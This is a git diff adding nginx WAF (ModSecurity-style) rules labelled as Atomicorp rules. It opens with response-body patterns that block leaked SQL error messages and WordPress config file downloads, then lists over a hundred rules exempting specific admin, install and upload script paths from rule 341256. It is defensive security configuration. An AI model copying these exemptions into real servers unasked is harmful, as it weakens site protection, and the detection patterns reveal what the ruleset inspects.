+SecRule RESPONSE_BODY "(?:(?:JET|Access) Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Microsoft SQL Error Message with sensitive information sent',id:'361030',rev:2,severity:'1',tag:'no_ar'"
+
+
+SecRule RESPONSE_BODY "(?:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle(?: error|.{,512}Driver)|Warning.{,512}oc(?:i|a)_)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Potential Orale SQL Error Message with sensitive information sent',id:'361229',rev:2,severity:'1',tag:'no_ar'"
+
+SecRule RESPONSE_BODY "define\(\'(?:WP_DEBUG|DB_NAME)"  "phase:4,deny,log,auditlog,capture,ctl:auditLogParts=+E,status:404,t:none,msg:'Atomicorp.com WAF Rules:  Wordpress Config file download blocked',id:'361230',rev:3,severity:'1',tag:'no_ar'"
+
+SecMarker  END_DLP_OUTPUT
+
+SecMarker END_POTENTIAL_ERROR_LEAK
+
diff --git a/nginx-waf/12_asl_adv_rules.conf b/nginx-waf/12_asl_adv_rules.conf
new file mode 100644
index 0000000..8d526f7
--- /dev/null
+++ b/nginx-waf/12_asl_adv_rules.conf
@@ -0,0 +1,2299 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/modules\.php" "phase:2,id:92739,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installatron/index\.cgi" "phase:2,id:92740,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:92741,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpinquiry\.php" "phase:2,id:92742,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/area/save-page\.php" "phase:2,id:92743,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/guestbook\.pl" "phase:2,id:92744,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:92745,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:92746,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/user\.php" "phase:2,id:92747,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/template\.php" "phase:2,id:92748,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact\.php" "phase:2,id:92749,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/conf\.php" "phase:2,id:92750,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/posted/edit_listing\.php" "phase:2,id:92751,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:92752,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:92753,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/area/add-edit\.php" "phase:2,id:92754,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/links\.php" "phase:2,id:92755,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:92756,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wysiwyg-edit" "phase:2,id:92757,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt-comments\.cgi" "phase:2,id:92758,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax/check_mandatory_fields\.php" "phase:2,id:92759,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:92760,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:92761,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/clients\.php" "phase:2,id:92762,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/dbpro\.cgi" "phase:2,id:92763,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:92764,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/images/logdnet\.php" "phase:2,id:92765,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact_form\.php" "phase:2,id:92766,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forum/register\.php" "phase:2,id:92767,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/index\.php" "phase:2,id:92768,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/class/class_add\.pl" "phase:2,id:92769,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/insert_image" "phase:2,id:92770,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/news\.php" "phase:2,id:92771,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editor\.php" "phase:2,id:92772,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-sys/formmail\.cgi" "phase:2,id:92773,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/frame\.aspx" "phase:2,id:92774,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/spaw/gethref\.php" "phase:2,id:92775,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/mt/mt\.fcgi" "phase:2,id:92776,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/google_cse/google_cse\.js" "phase:2,id:92777,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/runmodule\.php" "phase:2,id:92778,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/frame\.php" "phase:2,id:92779,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/videos/install" "phase:2,id:92780,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/support/staff/index\.php" "phase:2,id:92781,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/procform\.pl" "phase:2,id:92782,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcontent\.php" "phase:2,id:92783,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/html2rss/rss\.aspx" "phase:2,id:92784,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/winnder_step2\.1\.php" "phase:2,id:92785,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact/website\.php" "phase:2,id:92786,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/template\.php" "phase:2,id:92787,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sregister2-p\.php" "phase:2,id:92788,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/posting\.php" "phase:2,id:92789,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmysupport/trackerimage\.php" "phase:2,id:92790,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/chat\.php" "phase:2,id:92791,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:92792,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/egroupware/etemplate/process_exec\.php" "phase:2,id:92793,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:92794,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acollab/install/install\.php" "phase:2,id:92795,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/popup\.php" "phase:2,id:92796,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cgiemail/testform\.txt" "phase:2,id:92797,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/doeditboard\.php" "phase:2,id:92798,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:92799,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/fckeditor/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:92800,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_shoutbox\.php" "phase:2,id:92801,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:92802,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-general\.php" "phase:2,id:92803,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:92804,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:92805,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:92806,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mainsettings\.php" "phase:2,id:92807,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site\.php" "phase:2,id:92808,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/ciadmin\.php" "phase:2,id:92809,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/category\.php" "phase:2,id:92810,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/newbbex/post\.php" "phase:2,id:92811,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/mb/index2\.cgi" "phase:2,id:92812,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cerberus/parser\.php" "phase:2,id:92813,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/expand\.php" "phase:2,id:92814,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/mastersettings\.php" "phase:2,id:92815,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/edit_template\.php" "phase:2,id:92816,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clip/index\.php" "phase:2,id:92817,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/moduleinterface\.php" "phase:2,id:92818,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpanel/savetype\.php" "phase:2,id:92819,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/basic_settings\.php" "phase:2,id:92820,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/site_setup\.php" "phase:2,id:92821,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/core\.php" "phase:2,id:92822,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/system/index\.php" "phase:2,id:92823,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/truefm\.php" "phase:2,id:92824,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ummmanager\.cgi" "phase:2,id:92825,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/step6\.php" "phase:2,id:92826,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homecounter\.php" "phase:2,id:92827,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/options\.php" "phase:2,id:92828,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/media/hochron\.html" "phase:2,id:92829,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/index\.php" "phase:2,id:92830,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmspopouts/shortcuts\.php" "phase:2,id:92831,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manufacturers_edit\.php" "phase:2,id:92832,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contactmanage\.php" "phase:2,id:92833,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/giftcert\.php" "phase:2,id:92834,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pages/news\.htm" "phase:2,id:92835,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bb-login\.php" "phase:2,id:92836,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adview\.php" "phase:2,id:92837,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajcart/cart\.php" "phase:2,id:92838,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/install/-/configure" "phase:2,id:92839,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/store/zc_install/index\.php" "phase:2,id:92840,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_config\.php" "phase:2,id:92841,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cutenews/index\.php" "phase:2,id:92842,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/data/nanoadmin\.php" "phase:2,id:92843,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/auctions/rsstml\.php" "phase:2,id:92844,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/util\.php" "phase:2,id:92845,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/egroupware/index\.php" "phase:2,id:92846,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lclaccounts/setup/config\.php" "phase:2,id:92847,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/post_property\.php" "phase:2,id:92848,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filemanager/browser/default/browser\.html" "phase:2,id:92849,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:92850,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/ck\.php" "phase:2,id:92851,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/proxy/index\.php" "phase:2,id:92852,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "^/imp/" "phase:2,id:92853,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "modules/mod_wowstatus/wowserverstatus\.php" "phase:2,id:92854,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:92855,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:92856,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sysadminarea\.php" "phase:2,id:92857,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/download\.php" "phase:2,id:92858,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/net2ftp_installer\.php" "phase:2,id:92859,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mediaplayer\.swf" "phase:2,id:92860,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:92861,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/piwik\.php" "phase:2,id:92862,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/file_edit\.php" "phase:2,id:92863,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:92864,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fplayer\.swf" "phase:2,id:92865,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/images\.php" "phase:2,id:92866,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailer/redir\.php" "phase:2,id:92867,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sqlpatch\.php" "phase:2,id:92868,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:92869,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cart\.cgi" "phase:2,id:92870,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:92871,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/writetosfdc\.php" "phase:2,id:92872,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/nmanage\.php" "phase:2,id:92873,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login\.php" "phase:2,id:92874,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:92875,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webinstall\.php" "phase:2,id:92876,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pap\.swf" "phase:2,id:92877,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fckeditor\.html" "phase:2,id:92878,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/timthumb\.php" "phase:2,id:92879,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpthumb\.php" "phase:2,id:92880,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpthumb/phpthumb\.php" "phase:2,id:92881,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload\.php" "phase:2,id:92882,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/idevaffiliate/admin/setup\.php" "phase:2,id:92883,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install/index\.php" "phase:2,id:92884,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_create\.php" "phase:2,id:92885,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:92886,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_addfield\.php" "phase:2,id:92887,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_change\.php" "phase:2,id:92888,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmyadmin/" "phase:2,id:92889,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/movieonline\.php" "phase:2,id:92890,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:92891,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/test_index\.php" "phase:2,id:92892,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/recommend\.cgi" "phase:2,id:92893,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/goodscounter\.php" "phase:2,id:92894,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fla_video\.swf" "phase:2,id:92895,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin_board\.php" "phase:2,id:92896,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/search_results\.php" "phase:2,id:92897,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/wordtube/lib/statistic\.php" "phase:2,id:92898,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/paadmin/categories\.php" "phase:2,id:92899,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/alt_clickmenu\.php" "phase:2,id:92900,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/get\.php" "phase:2,id:92901,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-ajax\.php" "phase:2,id:92902,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:92903,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:92904,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/req\.php" "phase:2,id:92905,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/news/news\.cgi" "phase:2,id:92906,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/themes\.php" "phase:2,id:92907,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit-item\.php" "phase:2,id:92908,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
